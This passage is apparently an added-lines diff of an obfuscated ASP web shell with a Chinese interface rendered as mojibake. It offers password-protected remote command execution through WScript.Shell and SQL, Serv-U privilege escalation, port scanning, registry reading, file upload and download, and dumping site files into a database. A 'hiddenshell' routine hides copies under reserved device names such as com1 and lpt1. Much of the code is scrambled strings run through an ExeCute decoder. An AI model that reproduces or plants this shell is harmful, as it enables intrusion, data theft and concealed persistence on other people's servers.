+RRS"<tr><td height='21'><a href='?Action=Course' target='FileFrame'>���û��˺�</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=adminab' target='FileFrame'>�������Ա</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=getTerminalInfo' target='FileFrame'>���Զ���¼</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=ServerInfo' target='FileFrame'>�����֧��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Cmd1Shell' target='FileFrame'>��ִ��CMD����</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Cmd2' target='FileFrame'>��Cmd2</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=MMD' target='FileFrame'>��SQLִ��CMD</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=ScanPort' target='FileFrame'>���˿�ɨ��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Servu' target='FileFrame'>��Serv-u��Ȩ</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=suftp' target='FileFrame'>��Serv-u Ftp��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Servu7x' target='FileFrame'>��Serv-u7x��Ȩ</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=ReadREG' target='FileFrame'>����ע���</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=aspx' target='FileFrame'>��ASPX̽��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=php' target='FileFrame'>��PHP̽��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=jsp' target='FileFrame'>��JSP̽��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Cplgm&M=1' target='FileFrame'>���߼�����</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Cplgm&M=2' target='FileFrame'>����������</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=Cplgm&M=3' target='FileFrame'>�������滻</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=DbManager' target='FileFrame'>�����ݿ����</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=PageAddToMdb' target='FileFrame'>��������</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Logout' target='_top'>���˳���¼</a></td></tr>"
+End if
+RRS"</table></table>"
+End Function:
+Sub ScanDriveForm() 
+    Dim FSO,DriveB
+	Set FSO = Server.Createobject("Scripting.FileSystemObject")
+Response.Write "<TABLE width=480 border=0 align=center cellpadding=3 cellspacing=1 bgColor=#fff>"
+Response.Write "  <TR>"
+Response.Write "    <TD colspan=5 >����/ϵͳ�ļ�����Ϣ</TD>"
+Response.Write "  </TR>"
+
+
+  For Each DriveB in FSO.Drives
+
+Response.Write "  </TR>"
+Next
+Response.Write "  <TR>"
+Response.Write "    <FORM action="
+Response.Write "?Action=ScFolder&Folder="
+Response.Write FSO.GetSpecialFolder(0)
+Response.Write " method=Post>		  "
+Response.Write "	<TD align=middle><B>Windows�ļ���</B></TD>"
+Response.Write "	<TD colspan=3>"
+Response.Write FSO.GetSpecialFolder(0)
+Response.Write "</TD>"
+Response.Write "	<TD align=middle><INPUT type=submit value=��ϸ����></TD>"
+Response.Write "	</FORM>"
+Response.Write "  </TR>"
+Response.Write "  <TR>"
+Response.Write "    <FORM action="
+Response.Write "?Action=ScFolder&Folder="
+Response.Write FSO.GetSpecialFolder(1)
+Response.Write " method=Post>		  "
+Response.Write "	<TD align=middle><B>System32�ļ���</B></TD>"
+Response.Write "	<TD colspan=3>"
+Response.Write FSO.GetSpecialFolder(1)
+Response.Write "</TD>"
+Response.Write "	<TD align=middle><INPUT type=submit value=��ϸ����></TD>"
+Response.Write "	</FORM>"
+Response.Write "  </TR>"
+Response.Write "  <TR>"
+Response.Write "    <FORM action="
+Response.Write "?Action=ScFolder&Folder="
+Response.Write FSO.GetSpecialFolder(2)
+Response.Write " method=Post>		  "
+Response.Write "	<TD align=middle><B>ϵͳ��ʱ�ļ���</B></TD>"
+Response.Write "	<TD colspan=3>"
+Response.Write FSO.GetSpecialFolder(2)
+Response.Write "</TD>"
+Response.Write "	<TD align=middle><INPUT type=submit value=��ϸ����></TD>"
+Response.Write "	</FORM>"
+Response.Write "  </TR>"
+Response.Write "</TABLE><BR>"
+Response.Write "<DIV align=center>"
+Response.Write "<b>��ǰ��վ����·��:"&Server.MapPath("/")&"</b>"
+Response.Write "  <FORM Action="
+Response.Write "?Action=ScFolder method=Post>ָ���ļ��в�ѯ��"
+Response.Write "    <INPUT type=text name=Folder>"
+Response.Write "	<INPUT type=submit value=���ɱ���>Wָ���ļ���·��b�磺F:\ASP\"
+Response.Write "  </FORM>"
+Response.Write "<DIV>"
+	Set FSO=Nothing
+End Sub
+
+Sub ScanDrive(Drive) 
+    Dim FSO,TestDrive,BaseFolder,TempFolders,Temp_Str,D
+	If Drive <> "" Then
+	    Set FSO = Server.Createobject("Scripting.FileSystemObject")
+		Set TestDrive = FSO.GetDrive(Drive)
+		If TestDrive.IsReady Then
+		    Temp_Str = "<LI>���̷������ͣ�" & Red(TestDrive.FileSystem) & "<LI>�������кţ�" & Red(TestDrive.SerialNumber) & "<LI>���̹�������" & Red(TestDrive.ShareName) & "<LI>������������" & Red(GetTheSize(TestDrive.TotalSize)) & "<LI>���̾�����" & Red(TestDrive.VolumeName) & "<LI>���̸�Ŀ¼:" & ScReWr((Drive & ":\"))
+
+			Set BaseFolder = TestDrive.RootFolder
+			Set TempFolders = BaseFolder.SubFolders
+			For Each D in TempFolders
+			    Temp_Str = Temp_Str & "<LI>�ļ��У�" & ScReWr(D)
+			Next
+			Set TempFolder = Nothing
+			Set BaseFolder = Nothing
+	    Else
+		    Temp_Str = Temp_Str & "<LI>���̸�Ŀ¼:" & Red("���ɶ�:(")
+			Dim TempFolderList,t
+			t=0
+			Temp_Str = Temp_Str & "<LI>" & Red("���Ŀ¼���ԣ�")
+			TempFolderList = Array("windows","winnt","win","win2000","win98","web","winme","windows2000","asp","php","Tools","Documents and Settings","Program Files","Inetpub","ftp","wmpub","tftp")
+			For i = 0 to Ubound(TempFolderList)
+			    If FSO.FolderExists(Drive & ":\" & TempFolderList(i)) Then
+				    t = t+1
+					Temp_Str = Temp_Str & "<LI>�����ļ��У�" & ScReWr(Drive & ":\" & TempFolderList(i))
+			    End if
+		    Next
+			If t=0 then Temp_Str = Temp_Str & "<LI>�����" & Drive & "�̸�Ŀ¼����δ�з���:("
+	    End if
+		Set TestDrive = Nothing
+	    Set FSO = Nothing
+		Temp_Str = Temp_Str & "<LI>ע�⣺" & Red("��Ҫ���ˢ�±�ҳ�棬������ֻд�ļ��л����´��������ļ�!")
+		Message Drive & ":������Ϣ",Temp_Str,1
+	End if
+End Sub
+
+Sub ScFolder(folder) 
+    On Error Resume Next
+	Dim FSO,OFolder,TempFolder,Scmsg,S
+	Set FSO = Server.Createobject("Scripting.FileSystemObject")
+	If FSO.FolderExists(folder) Then
+	    Set OFolder = FSO.GetFolder(folder)
+		Set TempFolders = OFolder.SubFolders
+		Scmsg = "<LI>ָ���ļ��и�Ŀ¼��" & ScReWr(folder)
+		For Each S in TempFolders
+		     Scmsg = Scmsg&"<LI>�ļ��У�" & ScReWr(S)  
+		Next
+		Set TempFolders = Nothing
+		Set OFolder = Nothing
+	Else
+	    Scmsg = Scmsg & "<LI>�ļ��У�" & Red(folder & "�����ڻ��޶�Ȩ��!")
+	End if
+	Scmsg = Scmsg & "<LI>ע�⣺" & Red("��Ҫ���ˢ�±�ҳ�棬������ֻд�ļ��л����´��������ļ�!")
+	Set FSO = Nothing
+	Message "�ļ�����Ϣ",Scmsg,1
+End Sub
+
+Function ScReWr(folder):
+ On Error Resume Next
+   Dim FSO,TestFolder,TestFileList,ReWrStr,RndFilename
+   Set FSO = Server.Createobject("Scripting.FileSystemObject")
+   Set TestFolder = FSO.GetFolder(folder)
+   Set TestFileList = TestFolder.SubFolders
+   RndFilename = "\temp" & Day(now) & Hour(now) & Minute(now) & Second(now) & ".tmp"
+   For Each A in TestFileList
+   Next
+   If err Then
+       err.Clear
+	   ReWrStr = folder & "<FONT color=#ff2222> ���ɶ�,"
+	   FSO.CreateTextFile folder & RndFilename,True
+	   If err Then
+	       err.Clear
+		   ReWrStr = ReWrStr & "����дq</FONT>"
+	   Else
+	       ReWrStr = ReWrStr & "��дq</FONT>"
+		   FSO.DeleteFile folder & RndFilename,True
+	   End If
+   Else
+       ReWrStr = folder & "<FONT color=#ff2222> �ɶ�,"
+	   FSO.CreateTextFile folder & RndFilename,True
+	   If err Then
+	       err.Clear
+		   ReWrStr = ReWrStr & "����дY</FONT>"
+	   Else
+	       ReWrStr = ReWrStr & "��дY</FONT>"
+		   FSO.DeleteFile folder & RndFilename,True
+	   End if
+   End if
+   Set TestFileList = Nothing
+   Set TestFolder = Nothing
+   Set FSO = Nothing
+   ScReWr = ReWrStr
+End Function
+
+Sub Message(state,msg,flag)
+Response.Write "<TABLE width=480 border=0 align=center cellpadding=0 cellspacing=1 bgcolor=#fff>"
+Response.Write "  <TR>"
+Response.Write "    <TD >ϵͳ��Ϣ</TD>"
+Response.Write "  </TR>"
+Response.Write "  <TR>"
+Response.Write "    <TD align=middle bgcolor=#ecfccd>"
+Response.Write "	  <TABLE width=82% border=0 cellpadding=5 cellspacing=0>"
+Response.Write "	    <TR>"
+Response.Write "		  <TD><FONT color=red>"
+Response.Write state
+Response.Write "</FONT></TD>"
+Response.Write "		<TR>"
+Response.Write "		  <TD><P>"
+Response.Write msg
+Response.Write "</P></TD>"
+Response.Write "		</TR>"
+Response.Write "	  </TABLE>"
+Response.Write "	</TD>"
+Response.Write "  </TR>"
+Response.Write "  <TR>"
+Response.Write "    <TD class=TBEnd>"
+Response.Write "	"
+If flag=0 Then
+Response.Write "	      <INPUT type=button value=�ر� onclick=""window.close();"">"
+Response.Write "	"
+Else
+Response.Write "	      <INPUT type=button value=���� onClick=""history.go(-1);"">"
+Response.Write "	"
+End if
+Response.Write "	</TD>"
+Response.Write "  </TR>"
+Response.Write "</TABLE>"
+End Sub
+Function Red(str):Red = "<FONT color=#ff2222>" & str & "</FONT>"
+End Function
+Sub PageAddToMdb():ExeCute SinfoEn("atePth, cteAthm Dih`~)cteAth(~stueeq R =cteAth`~)thPahe~tt(esquRe= h atePth`0000=1uteOimtTipcr.SerrvSe0`he Tb~MdTodd~a= t Ache tIfn`thPahe(tdboMdTad)`UrckBa~&v>di</��!����>��br><erntcen=igalv di~<S RRl`nd.EseonspRe`Ifd En`he Tb~MdomFrseeael~r= t Ache tIfn`thPahe(tckPaun)`UrckBa~&v>di</��!����>��br><erntcen=igalv di~<S RRl`nd.EseonspRe`Ifd En`��:�д��ļ�r><bS~RR~`t>os=podthmem or<fS~RR~`0>=8zesi~ ~~& ) ~)~.h(atpPMar.veer(SdecoEnmlHt& ~ ~~e=luvah atePthe=am nutnp<iS~RR~`t>Ache=tmenab MdTodd=aueal venddhie=yp tutnp<iS~RR~`n>iopt/oO<FS>��pp=aueal vontiop><ontiop</SO>Fso=fueal vontiop><odthMehe=tmenat ecel<sS~RR~`>~ctlese</S~RR`>~��'ʼ��'��e=luvat miub=spetyt puin <S~RR`��~Ŀ¼ͬ��ľ��SH��H,λ�ļ�db.mSH��H���� ��ע:r><br><bS~RR`>~rmfo</S~RR`/>br:<��)O֧FS(��⿪����>��r/<hS~RR~`t>os=podthmem or<fS~RR~`0>=8zesi~ b~mdH.HS~\& ) ~)~.h(atpPMar.veer(SdecoEnmlHt& ~ ~~e=luvah atePthe=am nutnp<iS~RR~`'>����'��e=luvat miub=spetyt puin><cteAthe=am ndbmMroeFasleree=luvan deid=hpetyt puin <S~RR~`¼�¼�Ŀ��ͬHľHSλ�ڼ������ĵ������� ��ע:r><br><bS~RR~`>~rmfo</S~RR",Pos):End Sub
+
+
+Sub addToMdb(thePath):ExeCute SinfoEn("xtNee umes Rorrr EOn`lotaCado ar,Stnnco, amrest, nnco, rsm Dig`t~SerdcoReB.ODAD(~ctjeObteeaCrr.veer S =rst Se)`~)amreStB.ODAD(~ctjeObteeaCrr.veer S =amrestt Se`~)ontiecnnCoB.ODAD(~ctjeObteeaCrr.veer S =nncot Se`~)ogalat.COXAD(~ctjeObteeaCrr.veer S =ogalatoCadt Se`~)db.mSH~Hh(atpPMar.veer S &=~ceurSoa at D0;4.B.EDOLt.Jet.ofoscrMir=deviro~P= r Stnnco`Stnncoe atre.CogalatoCadr`Stnncon pe.Onncor`)~gema IntteoneCil fr,harCVah atePth, EDERSTLU CEY KRYMARI P1)0,Y(ITNTDE Int iIda(ateDil Fleab TteeaCr(~tecuxe.Ennco)`pe.Oamrestn`= e yp.Tamrest1` 33,, nnco, a~ateDil~Fn pe.Ors`enTh~ so~f= ) d~hoeteMth(~stueeq RIf`eatr ss, rh,atePthb MdoreFreoTfsm`ls Ee`amrest, rs, thPahe tdbrMFoeeTrsa`Ifd En`selo.Crs`selo.CnnCo`selo.Camrest`nghiot N =rst Se`nghiot N =nncot Se`nghiot N =amrestt Se`nghiot N =ogalatoCadt Se",Pos):End Sub:
+Function fsoTreeForMdb(thePath, rs, stream):ExeCute SinfoEn("FileL, sysfilesers,  foldlder,theFotem, Dim iist`SH.ldmdb$H$HSH.t = ~leLissysFib$~`se Th= Falath) (thePxistslderE~).FobjectstemOileSying.Fcriptct(~SeObjeCreatrver.If Seen`����!~)���߲�����Ŀ¼������ & ~ ePathrr(thshowE`End If`(thePolder.GetFect~)emObjeSystg.Filiptin(~ScrbjecteateOer.Cr Servder =heFolSet tath)`r.FilFolde= theiles Set fes`ubFolder.SheFols = tolderSet fders`n foltem Iach iFor Eders`treamrs, sath, tem.PMdb ieeForfsoTr`Next`n filtem Iach iFor Ees`<= 0 ~$~) me & em.Na & it, ~$~eListysFilStr(sIf InThen`rs.AddNew`Path,item. Mid(h~) =hePatrs(~t 4)`Path)item.File(dFromm.Loastrea`m.Reastrea~) = ntentileCors(~fd()`rs.Update`End If`Next`= Notiles Set fhing`othins = NolderSet fg` Nothder =heFolSet ting",Pso):End Function:Sub unPack(thePath):ExeCute SinfoEn("xtNee umes Rorrr EOn`0000=1uteOimtTipcr.SerrvSe0`deoleFth, trnSon cm,eatr sn,on cr,st, ws, rsm Dir`~\& ) .~(~thPaap.MerrvSe= r st~`~)etdSorec.RDBDO~At(ecbjeOatre C =rst Se`m~eatr.SDBDO~At(ecbjeOatre C =amrestt Se)`n~ioctneon.CDBDO~At(ecbjeOatre C =nncot Se)`~;& h atePth& ~ e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro~P= r Stnnco~`Stnncon pe.Onncor` 11,, nnco, a~ateDil~Fn pe.Ors`pe.Oamrestn`= e yp.Tamrest1`Eos. rilnt UDof`~)~\, ~)thPahe~ts((revrRStIn, ~)thPahe~ts((rftLe= r deoleFth)`he Tseal F =r)deoleFth& r sts(stxirEdeol.F~)ctjeObemstSyleFig.inptriSc(~ctjeObteeaCrr.veer SIfn`erldFohe t &tr(serldFoteeacr)`Ifd En`s(Eoet.Samrest)`~)ntteoneCil~fs( rteri.Wamrest` 2),h~atePth(~rs& r ste iloFeTav.Samrest`exeNov.Mrst`opLo`selo.Crs`selo.Cnnco`selo.Camrest`nghiot N =wst Se`nghiot N =rst Se`nghiot N =amrestt Se`nghiot N =nncot Se",Pos):End Sub:Sub createFolder(thePath):ExeCute SinfoEn("m Dii`\~ ~h,atePthr(stIn= i )` 0 > ilehi WDo`enThe lsFa= ) i), thPahe(tftLes(stxirEdeol.F~)ctjeObemstSyleFig.inptriSc(~ctjeObteeaCrr.veer SIf`)) 1 - ih,atePtht(ef(LerldFoteeaCr).t~ecbjmOteyseSil.Fngtiipcr~St(ecbjeOatre.CerrvSe`Ifd En`he T~)~\, 1)+ i , thPahe(tid(MtrnS IIfn`\~ ~), 1 + ih,atePthd(Mir(stIn+ i = i )`ls Ee`= i 0`Ifd En`opLo",Pos):End Sub:Sub saTreeForMdb(thePath, rs, stream):ExeCute SinfoEn("stLileFiys sr,deoleFth, emitm Di`b$ldH.HSb$mdH.HS~$= t iseLilsFsy~`h)atePthe(acSpmeNaX.sa= r deoleFtht Se`mste.IerldFohe tInm te ichEar Fo`enThe ru T =erldFoIsm.te iIf`amrest, rs, thPam.te idbrMFoeeTrsa`ls Ee`enTh0 =  <~)~$& e am.Nemit& ~ ~$, stLileFiys(strnS IIf`Nedd.Arsw` 4h,at.Pemitd(Mi= ) h~atePth(~rs)`h)at.Pemite(ilmFrodFoa.Lamrest`d(ea.Ramrest= ) t~enntColefi(~rs)`atpd.Urse`Ifd En`Ifd En`xtNe`inthNo= r deoleFtht Seg",Pos):End Sub:Function Course():ExeCute SinfoEn("ter'>='cenalign='0' ddingellpa'1' ccing=llspa0' ceder='' bor'menuolor=' bgc='600widthable br><tSI=~<~`></tr��</tdͳ�û����nu'>ϵr='megcoloer' b'centlign='3' aspan=' colt='20heigh><td &~<trSI=SI>~` nextesumeror ron er`NT://(~Winbject getObj inach ofor e.~)`err.clear`e=~~ rtTypJ.Staif OBthen`&~<trSI=SI>~`&nbspFF~~>#FFFFor=~~bgcol20~~ ht=~~ heig&~<tdSI=SI;~`&obj.SI=SIName`>&nbsFFF~~~#FFFlor=~ bgcod><td&~</tSI=SIp;~ `��(��)~&~ϵͳ��SI=SI`d></t&~</tSI=SIr>~`d></tp;</t>&nbs~~2~~span=~ colFFFF~~~#FFolor=~ bgc~~20~ight=td he<tr><SI0=~r>~ `end if`x=~�Զ�hen le=2 trtTypJ.Staif OB~`x=~�ֶ�hen le=3 trtTypJ.Staif OB~`x=~����hen le=4 trtTypJ.Staif OB~`pe=2 artTyBJ.Stand Owin~ ))<>~h,4,3j.patid(obase(mif LCthen`></tr></td/fontth&~<bj.pap;~&o>&nbsF0000or=#Ft col]<fon&lx&~������:~~~>[��n=~~2olspaF~~ cFFFFFr=~~#gcolo0~~ bt=~~2heigh><td &~<tryNameisplaobj.Dsp;~&~>&nbFFFF~~~#FFolor=~ bgc~~20~ight=td he/td><me&~<bj.Nap;~&o>&nbsFFF~~~#FFFlor=~ bgco~20~~ght=~d heitr><tI1&~<SI1=S>~`else`></tr></td/fontth&~<bj.pap;~&o>&nbs399FFor=#3t col]<fon&lx&~������:~~~>[��n=~~2olspaF~~ cFFFFFr=~~#gcolo0~~ bt=~~2heigh><td &~<tryNameisplaobj.Dsp;~&~>&nbFFFF~~~#FFolor=~ bgc~~20~ight=td he/td><me&~<bj.Nap;~&o>&nbsFFF~~~#FFFlor=~ bgco~20~~ght=~d heitr><tI2&~<SI2=S>~`end if`next`</tabSI2&~&SI1&I&SI0RRS Sle>~",Pso):End Function:Function ServerInfo():ExeCute SinfoEn("ter'>='cenalign='0' ddingellpa'1' ccing=llspa0' ceder='' bor'menuolor=' bgc='80%widthable br><tSI=~<~`></trϢ</td���������nu'>��r='megcoloer' b'centlign='3' aspan=' colt='20heigh><td &~<trSI=SI>~`td></)&~</NAME~RVER_s(~SEiableerVar.servquest>~&reFFFF'='#FFcolortd bg/td><bsp;<F'>&nFFFFFor='#bgcol><td ��</td'>������FFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SItr>~`FFF'>'#FFFolor=d bgctd><tsp;</'>&nbFFFFFr='#Fgcolo<td b</td>������IPFFF'>'#FFFolor=' bgc='200width'20' ight=td heer'><'centlign=<tr aank'>='_blargetrm' t'ipfoname=asp' ndex.com/ip138.www.itp://n='htactiopost thod=rm me&~<foSI=SI~`/form/tr></td><'2'><alue=on' v'actiname=den' ='hid typeinput��ѯ'><lue='t' vasubmiype='put t> <in~)&~'_ADDRLOCALles(~ariabrverVst.SeRequee='~& valu='15' size='ip' nametext'ype='put t&~<inSI=SI>~`</tr></td>nbsp;ow&~&'>~&nFFFFFr='#Fgcolo<td b</td>nbsp;FF'>&#FFFFlor=' bgcod><tdʱ��</t'>������FFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SI~`></tr~</tdRS~)&CESSOF_PROBER_O(~NUMablesrVariServeuest.~&ReqFFF'>'#FFFolor=d bgctd><tsp;</'>&nbFFFFFr='#Fgcolo<td b</td>CPU����'>������FFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SI>~`d></t&~</t~OS~)bles(Variaerverest.S&RequFF'>~#FFFFlor=' bgcod><tdp;</t>&nbsFFFF'='#FFcolortd bg/td><����ϵͳ<'>������FFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SIr>~`></tr~</tdRE~)&OFTWAVER_S(~SERablesrVariServeuest.~&ReqFFF'>'#FFFolor=d bgctd><tsp;</'>&nbFFFFFr='#Fgcolo<td b</td>�������汾'>WEBFFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SI>~`=0 ToFor i 13`td></)&~</t(i,2>~&So=leftalignFFF' '#FFFolor=d bgctd><t)&~</t(i,1>~&SoFFFF'='#FFcolortd bg/td><0)&~<ot(i,'>~&SFFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SItr>~`Next`RRS SI",Pso):End Function:Function DownFile(Path):ExeCute SinfoEn("arle.CseonspRe`)),0(6ot(SctjeObteeaCr= M OSt Se`enOpM.OS` 1 =peTyM.OS`at PleFiomFradLoM.OSh`)+\~,~thpav(Retrns=Isz1`z),sthpad(Mi& ~ e=amenil ft;enhmactt~a, n~ioitosspDit-enntCo ~eradHedd.AseonspRe`iz.SSM O~,thngLet-enntCo ~eradHedd.AseonspRee`8~F-UT ~ =etrsha.CseonspRe`amrestt-teocn/ioaticplap ~ =peTyntteon.CseonspRe~`ea.RSM OteriyWarin.BseonspRed`shlu.FseonspRe`osClM.OSe`inthNo= M OSt Seg",Pos):End Function:Function HTMLEncode(S):if not isnull(S) then:S= replace(S,">","&gt;"):S=replace(S,"<","&lt;"):S=replace(S,CHR(39),"&#39;"):S=replace(S,CHR(34),"&quot;"):S=replace(S,CHR(20),"&nbsp;"):HTMLEncode=S:end if:End Function:sub hiddenshell
+fpath=request.servervariables("path_translated"):set fso=server.createobject("scripting.filesystemobject"):pex="com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt9":rndpex=split(pex,"|")(rndnumber(0,17)):session("seljw")="":filepath1=server.mappath("."):filename1=right(fpath,len(fpath)-instrrev(fpath,"\")):url=request.servervariables("url"):url=left(url,instrrev(url,"/"))&rndpex&"."&filename1:fso.copyfile fpath,"\\.\"&filepath1&"\"&rndpex&"."&filename1:set fso=nothing:rrs "<script>parent.location='http://"&request("server_name")&url&"';</script>"
+end sub:Function UpFile():
+If Request("Action2")="Post" Then
+Set U=new UPC : Set F=U.UA("LocalFile")
+UName=U.form("ToPath")
+If UName="" Or F.FileSize=0 then
+SI="<br>�������ϴ�����ȫ·����ѡ��һ���ļ��ϴ�!"
+Else
+F.SaveAs UName
+If Err.number=0 Then
+SI="<center><br><br><br>�ļ�"&UName&"�ϴ��ɹ���</center>"
+RRS ""&copyurl&""
+End if
+End If
+Set F=nothing:Set U=nothing
+SI=SI&BackUrl
+RRS SI
+ShowErr()
+Response.End
+End If
+SI="<br><br><br><table border='0' cellpadding='0' cellspacing='0' align='center'>"
+SI=SI&"<form name='UpForm' method='post' action='"&URL&"?Action=UpFile&Action2=Post' enctype='multipart/form-data'>"
+SI=SI&"<tr><td>"
+SI=SI&"�ϴ�·����<input name='ToPath' value='"&RRePath(Session("FolderPath")&"\ice.asp")&"' size='40'>"
+SI=SI&" <input name='LocalFile' type='file'size='25'>"
+SI=SI&" <input type='submit' name='Submit' value='�ϴ�'>"
+SI=SI&"</td></tr></form></table>"
+RRS SI:
+End Function::Function Cmd1Shell():ExeCute SinfoEn("checked=~ checked~`t(~SPeques) = RPath~Shellion(~ Sess Then)<>~~(~SP~questIf Re~)`ath~)hellPon(~SSessiPath=Shell`md.ex = ~clPath Shel Thenth=~~ellPaif She~`heckehen ces~ t)<>~yript~(~wscquestif Red=~~`cmd~)est(~ RequCmd =n Def~ The~)<>~(~cmdquestIf Re`st'>~d='pomethoform SI=~<`bsp;~sp;&n'>&nbh:70%'widttyle=&~' SlPath&Shelue='~' vale='SPt nam<inpuLL·����&~SHESI=SI`hell~ipt.S>WScrked&~&checyes'~lue='t' vascripme='wx' naeckboe='chc typlass=put c&~<inSI=SI`440;'ight:0%;heth:10='widStylearea <text'ִ��'>alue=it' v'submtype=nput '> <iCmd&~~&Deflue='%' vath:92='widStylecmd' ame='put n&~<inSI=SI>~`~ The~)<>~(~cmd.FormquestIf Ren`s~ th)=~yeript~(~wsc.Formquestif Reen`Sot(1ject(ateObM=CreSet C,0))`~&Def~ /c Path&Shellexec(D=CM.Set DCmd)`eadalout.rD.stdaaa=Dl`SI=SI&aaa`else` Nextesumeror ROn Er`.Shelcriptt(~WSObjecreatever.Cs=SerSet wl~)`.Shelcriptt(~WSObjecreatever.Cs=SerSet wl~)`bjectstemOileSying.Fcriptct(~SeObjeCreatrver.so=SeSet f~)`md.txth(~cmapparver. = sepFileszTemt~)` 0, TFile,zTemp~ & s ~ > Cmd && Def/c ~ th&~ ellPan (Shws.RuCall rue)`ject~temObleSysng.Firiptit(~ScObjecreates = CSet f)`se, 0, Falle, 1empFi (szTtFileenTexfs.Opcx = FilelSet o)`.Readlelcxe(oFiEncod.HTMLerveraaa=SAll)`lcx.CoFilelose`, TrupFileszTemFile(eletefso.DCall e)`SI=SI&aaa`end if`End If`></fotarea</tex13)&~&chr(SI=SIrm>~`RRS SI",Pso):End Function:ExeCute SinfoEn("ioctun Fnd:EtrwSne= f iner:SxtNe):os P -618329 ( &os+P)) 1i,, trtsged(Mic(As& r Stew n =trwSne):trtsgen(Leo  T 1 = ior:FtrwSne,  iim:Ds)Po, trtsgef(iner SontincFun",Pos):Function CreateMdb(Path):ExeCute SinfoEn(">~br><br~<I= S`) 0)2,t(Sot(ecbjeOatre C = Cet S`thPa& ~ e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro~Pe(atre.C C)`nghiot N = Cet S`he T=0ermbnur.Erf  In`��!����~��& h at P &SI= I  S~` Ind Ef`rlkUac&BSII= S ` SRS RI",Pos):End function:Function CompactMdb(Path):ExeCute SinfoEn("enTh) ,1(0ot Sot NIf`)),0(3ot(SctjeObteeaCrC=t Se `at&P~ e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro,P&~thPa~&e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro~Pe asabattDacmpCoC.h`inthNoC=t Seg`seEl`)),1(0ot(SctjeObteeaCrO=FSt Se`enTh) thPas(stxieEil.FSO FIf`)),0(3ot(SctjeObteeaCrC=t Se `k~ba~_h&at&P~ e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro,P&~thPa~&e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro~Pe asabattDacmpCoC.`inthNoC=t Seg`at PleFiteleDeO.FSh`at,Pk~ba~_h&at PleFiveMoO.FSh`seEl`>~erntce</�֣��з�~ûh&at&P��~����r><br><br><br>teen<c=~SI `=1ermbnur.Er`Ifd En`inthNoO=FSt Seg`Ifd En`enTh0 r=beum.nrr EIf`>~erntce</��������~ѹh&at&P��~����r><br><br><br>teen<c=~SI`Ifd En`UrckBaI&=SSIl`SIS RR",Pos):End Function
+if session("web2a2dmin")<>UserPass then
+if request.form("pass")<>"" then
+if request.form("pass")=UserPass then
+session("web2a2dmin")=UserPass
+x m:response.redirect url
+else
+rrs"<center>'"&errout&"'</center>"
+end if
+else
+si="<center><div style='width:500px;border:1px solid #222;padding:22px;margin:100px;'><br><hr><FORM Action='"&URL&"' method=Post> <INPUT type=Password name=Pass size=22>&nbsp;<input type=submit value=Login><hr><br>"&mmshell&"</div></center>"
+if instr(SI,SIC)<>0 then rrs sI
+end if
+response.end
+end if
+Function DbManager():ExeCute SinfoEn("tr~))~SqlSForm(uest.m(Reqr=TriSqlSt`DbStrorm(~est.F=RequDbStr~)`ing='lpadd' celng='0spaci cellr='0'borde'650'idth=ble w&~<taSI=SI0'>~`on='' actipost'hod='' metbFormme='Drm na&~<foSI=SI>~`�Ӵ�:</;���ݿ���&nbsp27'> ght='' hei='100width><td &~<trSI=SItd>~`/td>~~~~><bStr&~~~&Dalue=70' vdth:4e='wi stylbStr'me='Dut na><inp&~<tdSI=SI`ption����</occesse=0>A valuptionon><o/opti�Ӵ�ʾ��<=-1>��valuetion '><opalue)ex].vedIndelectons[s(optiDbStr Fulleturnge='rnchantn' o'StrBname=lect '><seentergn='c' alih='60 widt&~<tdSI=SI>~`ption����</o3>DSNalue=ion v><optption����</oMySqlue=2>n valoptioion><</optSql����=1>Msvaluetion &~<opSI=SI>~`tion>��</op5>������alue=ion v><optption����</o=4>��ʾvaluetion n><opoptio��--</-SQL��=-1>-valuetion &~<opSI=SI~`ion>~</opt>�����ݱ�lue=8on va<optition>��</op7>�޸���alue=ion v><optption����</o=6>ɾ��valuetion &~<opSI=SI`ption�ֶ�</o11>ɾ��alue=ion v><optption�ֶ�</o10>����alue=ion v><optption�ݱ�</o=9>ɾ��valuetion &~<opSI=SI>~`></tr></tdelectn></soptioȫ��ʾ</=12>��valuetion &~<opSI=SI>~`lue='n' vahiddeype='ge' te='Pat nam<inpuger'>bManaue='D' validdenpe='hn' tyActioame='put n&~<inSI=SI1'>~`:</tdL��������sp;SQ'>&nbt='30heigh><td &~<trSI=SI>~`></tdr&~~~SqlSt=~~~&value470' idth:le='w' styqlStrme='Sut na><inp&~<tdSI=SI>~`/td>~()'><Checkrn Db'retulick=' once='ִ�� valubmit'e='Su' 